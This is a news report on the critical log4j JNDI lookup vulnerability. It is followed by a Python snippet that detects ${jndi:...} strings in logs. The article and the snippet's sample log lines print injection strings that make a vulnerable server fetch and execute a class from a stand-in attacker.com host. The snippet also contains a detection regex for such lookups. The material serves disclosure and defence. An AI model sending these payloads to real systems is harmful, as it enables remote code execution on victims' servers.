Catastrophic vulnerability in Apache log4j affecting many Java projects

A critical vulnerability has been found in Apache log4j, a popular framework for organizing logging in Java applications. It allows arbitrary code to be executed when specially crafted values in the format "${jndi:URL}" are written to the log. The attack can be carried out on Java applications that log values obtained from external sources, for example, when printing problematic values in error messages. It is noted that almost all projects using Apache Struts are affected by the problem, including Steam, Apple iCloud and Minecraft. It is expected that the vulnerability may lead to a wave of mass attacks on corporate applications, repeating the history of the critical vulnerabilities in Apache Struts.

The problem is aggravated by the fact that a working exploit has already been published, while fixes for the stable branches have not yet been prepared. A CVE identifier has not yet been assigned. The fix is so far included only in the test branch log4j-2.15.0-rc1.
As a workaround to block the vulnerability, it is recommended to set the parameter log4j2.formatMsgNoLookups to true.

The problem is caused by the fact that log4j supports processing of special "${}" masks in strings written to the log, including JNDI (Java Naming and Directory Interface) requests. The attack comes down to passing a string containing "${jndi:ldap://attacker.com/a}"; when processing it, log4j will send an LDAP request to the attacker.com server to obtain a Java class. The class returned by the attacker's server (for example, https://second-stage.attacker.com/exploit.class) will be loaded and executed in the context of the current process, which allows the attacker to execute arbitrary code on the system with the rights of the current application.
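As an added illustration for defenders (not code from the article or from the log4j project), the following Python snippet scans log lines for the "${jndi:...}" lookup pattern described above, tolerating the case and whitespace variations of the quoted string, and extracts the lookup scheme and target host for triage. The sample log lines are constructed for this example; the hostname attacker.com is the one used in the article.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches a literal log4j lookup of the form ${jndi:<scheme>:<rest>}.
# Case-insensitive and tolerant of whitespace around "$", "{" and ":",
# since the article itself quotes the string as "$ {JNDI: LDAP: //...}".
JNDI_RE = re.compile(r"\$\s*\{\s*jndi\s*:\s*([a-z]+)\s*:\s*([^}]*)\}", re.IGNORECASE)
# Pulls the host out of the "//host[:port]/path" remainder of the lookup.
HOST_RE = re.compile(r"^\s*//\s*([^/:\s]+)")


@dataclass
class JndiHit:
    line_no: int
    scheme: str          # e.g. "ldap" or "rmi", lower-cased
    host: Optional[str]  # target host if the remainder looks like a URL
    raw: str             # the matched lookup string, for the incident record


def find_jndi_lookups(lines: List[str]) -> List[JndiHit]:
    """Return one JndiHit per literal ${jndi:...} lookup found in `lines`.

    Caveat: this only catches lookups spelled out literally; a log4j
    instance that still evaluates lookups would also expand nested
    ones, so this is a triage aid, not a substitute for the fix.
    """
    hits: List[JndiHit] = []
    for line_no, line in enumerate(lines, start=1):
        for m in JNDI_RE.finditer(line):
            host_m = HOST_RE.match(m.group(2))
            hits.append(JndiHit(line_no, m.group(1).lower(),
                                host_m.group(1) if host_m else None, m.group(0)))
    return hits


# Constructed sample access-log lines (not real traffic): a benign request,
# the article's string in a User-Agent, a whitespace/case variant, and an
# RMI variant in the query string.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.com/a}"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "$ {JNDI: LDAP: //attacker.com/a}"',
    '10.0.0.7 - - "GET /search?q=${JnDi:RMI://attacker.com:1099/x} HTTP/1.1" 404 "-"',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit.line_no}: scheme={hit.scheme} host={hit.host} raw={hit.raw!r}")
```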

Source: media reports.